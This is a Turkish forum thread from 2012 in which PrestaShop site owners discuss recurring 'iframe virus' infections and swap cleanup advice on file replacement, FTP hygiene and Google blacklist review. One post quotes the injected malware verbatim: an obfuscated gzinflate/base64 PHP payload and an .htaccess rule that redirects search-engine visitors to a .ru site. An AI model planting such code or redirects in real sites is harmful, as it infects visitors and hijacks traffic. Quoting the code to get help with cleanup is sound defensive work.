ücretli son sürüm yükleme ve iframe temizleme talebi

[tanernima]

Merhaba, sitemizin prestashop yazılımının güncellenmesini ve iframe virüslerinin temizlenmesini talep ediyoruz. bu konuda ilgilenen arkadaşlar (tercihen ankaradan) fiyat teklifi yaparlarsa seviniriz.

[safa]

merhabalar;

nedense son zamanda bu iframe virüsü çok sık çıkmaya başladı. iframe virüsünde ciddi bir artış var türkiyedeki prestashop sitelerinde.

bu hata ile karşılaşanlara tavsiyem . site dosyalarının resim klasörü hariç bütün php ve tpl dosyalarının orjinalleriyle değiştirilip. sonra güncelleme yapılmasıdır.

* siteye ftp ile bağlantı yapılacak bilgisayarların iyi bir virüs taramasından geçirilmesi(en iyisi format)

* bu virüs hosting merkezlide olabiliyor çok sorun teşkil etmeyecekse hosting firmasının değiştirilmesi.

 

not: işe talip değilim.

[tanernima]

bu konuda bize yardımcı olabilecek kimse yokmu acaba

[MEG Venture]

Sitenizin adresini buradan paylaşabilir misiniz?

[tanernima]

site adresini özelden gönderdim

[tanernima]

acaba dosyalara virüs bulaşmasını (iframe) engellemek için dosya izinlerini nasıl ayarlamalıyız?

çünkü galiba izinlerle ilgili bir problem söz konusu?

[MEG Venture]

site adresini özelden gönderdim

 

Size özelden birkaç soru sordum ancak buradan da sorabilirim isterseniz. Belki işe talip çıkabilir. Cevaplayabilir misiniz?

 

Güncelleme : Cevap alamadığımdan sorum iptal edilmiştir.

Edited July 25, 2012 by Caglar (see edit history)

[tanernima]

@çağlar: mesajı cevapladım

bu arada virüslü dosyları ısrarla temizlemememize rağmen 1 gün sonra aynı dosyalara aynı virüsler tekrar bulaşıyor ve bu durumun dosya izinleri ile ilgili olduğu söyleniyor. en azından bu konuda birisi yardımcı olursa sitenin sağlıklı çalışmasını sağlayabiliriz.

[tanernima]

aşağıdaki dosyaları hergün temizlememize rağmen süreki bu virüs aktif oluyor.

 

***

#c3284d#

echo(gzinflate(base64_decode("JY5NDoIwEIX3JNyhmQ26odGFC6V4CS9Qy9COKaUZBtHbC7J7+fL

+mskxZVHyzWhA8CP6Zd92p9CWRTe6ecAk9cIkeKga6tkOqCZ2BoJIvmqdZ84ReyZvBWueNaXaebqfL

qDSajbwWEgEGdRaPMZIyRuws4yg/m3PkTtkA2kFNpJPBty6uQUCkg9i4AxqoU7CptpG7y/a6ngri0bvd9sf")));

#/c3284d#

***

 

 

 

aynı zamanda .htacces dosyasınada bu kod ekleniyor.

***

#c3284d#

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ http://purplefrigate.ru/in.cgi?16 [R=301,L]

</IfModule>

#/c3284d#

***

 

 

bu dosyaların izinlerini ne yapmamız daha doğru olur acaba?

 

 

./translations/index.php

./introlu-index.html

./.htaccess

./classes/SubDomain.php

./classes/index.php

./img/index.php

./css/index.php

./modules/.htaccess

./modules/index.php

./tools/index.php

./admin222/login.php

./admin222/index.php

./upload/index.php

./header.php

./themes/debug.tpl

./themes/index.php

./config/index.php

./download/.htaccess

./download/index.php

./js/tinymce.inc.js

./js/index.php

./mails/index.php

./index.php

./footer.php

Edited July 26, 2012 by tanernima (see edit history)

[safa]

sadece resim klasörünün içindeki index php dahil diğer bütün dosyarı yeniden yükleyin.(sadece resimleriniz kalsın)

dil dosyalarının yedeğini bile almayın tr.php lerede bulaşıyor bu.

bu virüs sadece yukardaki dosyalara bulaşamaz. nerdeyse hepsine bulaşmıştır. yani sadece resimler kalacak. diğer dosyalar tamamen orjinalleriyle değişecek.

bu işlemi uzatırsanız seo açısından google ceza veriyor , sorunu çözseniz bile siteniz 1 adım arkada listeleniyor.

 

yukardaki yazımda bilgisayara format veya iyi bir virüs taraması demiştim. onada dikkat edin. uzun ve zahmetli bir iş bu.

size kolay gelsin

[tanernima]

Öncelikle yardımınız için teşekkürler, yalnız prestashop sürümümüz oldukça eski, bu nedenle dosyaları yenileri ile değiştirmemiz

sorun yaratabilir düşüncesindeyim.

 

bilgisayarımızda ise nod32 kullanıyoruz ve şu ana kadar yaptığımız taramalarda herhangi bir virüse rastlamadık.

host sağlayıcımız ile yaptığımız görüşmeye istinaden dosyalara virüs bulaştıran bir ftp kullanıcısını sildik ve ftp programlarını bilgisayarımızdan kaldırdık. şu an için beklemedeyiz, umarız ki dosyalara tekrardan virüs bulaşmaz.

 

 

sadece resim klasörünün içindeki index php dahil diğer bütün dosyarı yeniden yükleyin.(sadece resimleriniz kalsın)

dil dosyalarının yedeğini bile almayın tr.php lerede bulaşıyor bu.

bu virüs sadece yukardaki dosyalara bulaşamaz. nerdeyse hepsine bulaşmıştır. yani sadece resimler kalacak. diğer dosyalar tamamen orjinalleriyle değişecek.

bu işlemi uzatırsanız seo açısından google ceza veriyor , sorunu çözseniz bile siteniz 1 adım arkada listeleniyor.

 

yukardaki yazımda bilgisayara format veya iyi bir virüs taraması demiştim. onada dikkat edin. uzun ve zahmetli bir iş bu.

size kolay gelsin

[safa]

rica ederim sorun olursa yine yazın yardımcı olmaya çalışırız.

kolay gelsin

[miniraa]

Bizdede tamamiyle ayni sorun var (iframe virusu) Tanerniva iframe le savasinizda son durumlariniz nasil?

[Şahin YILDIZ]

Bunun için aşağıdaki programı kullanın, nasıl yapıldığını videoda izleyin

 

 

Script (site) İçinde Virüs, Link, Yazı Bul Kolayca Sil Veya Değiştir.

[ozkankandemir]

Site sahiplerinin sıkça karşılaştıgı Malvare virüsünden kurtulmak için bu yöntemi denemelisiniz

Ftp den temizleseniz dahi bilgisayarınıza bulaştığı için siz ftp ye her girişinizde bu vrüsü bulaştırısınız öncelik bilgisayarınızı temizlemeniz

Öncelikle ücretsiz olan Norman Malware Cleaner ile bilgisayarınızı taratın

Bilgisayarınızdaki zararlı içerikleri temizledikten sonra http://sitecheck.sucuri.net adresinden virüslü dosyaları tespitini yapınız ftp programındaki virüslü içeriklerin tespitinden sonra yazılımın temiz versiyonuyla dosyaları değiştirin en önemlisi tüm işlemlerin başında ve sonunda ftp şifrenizin mutlaka değiştirin

 

Geldi google karaliste den çıkmaya google webmaster tools dan sitenizdeki tüm zararlı içerikleri temizledigine eminseniz Siteniz için inceleme isteginde bulununuz 4 saat içerisinde zaralı içerik yok ise kara listeden çıkarsınız

Herşey yoluna girmesi dileğiyle

Edited September 13, 2012 by ozkankandemir (see edit history)

[acemiprestaci]

selam.

 

1 ) kesinlikle cracklı bir ftp programı kullanma. örneğin filezillayı kullanç

 

2 ) Hityap ın verdiği program işe yarıyor . dosyaları temizle. daha sonra aynı dosyaları tekrar ftp ye at. fakat ftp şifreni de değiştir.

 

3 ) Pc nin temiz olduğundan emin ol.

[MEG Venture]

Bunun için aşağıdaki programı kullanın, nasıl yapıldığını videoda izleyin

 

 

Script (site) İçinde Virüs, Link, Yazı Bul Kolayca Sil Veya Değiştir.

 

Programın linki sanırım bozulmuş. Tekrar verebilir misiniz?

[Şahin YILDIZ]

Buradan Bakabiliriniz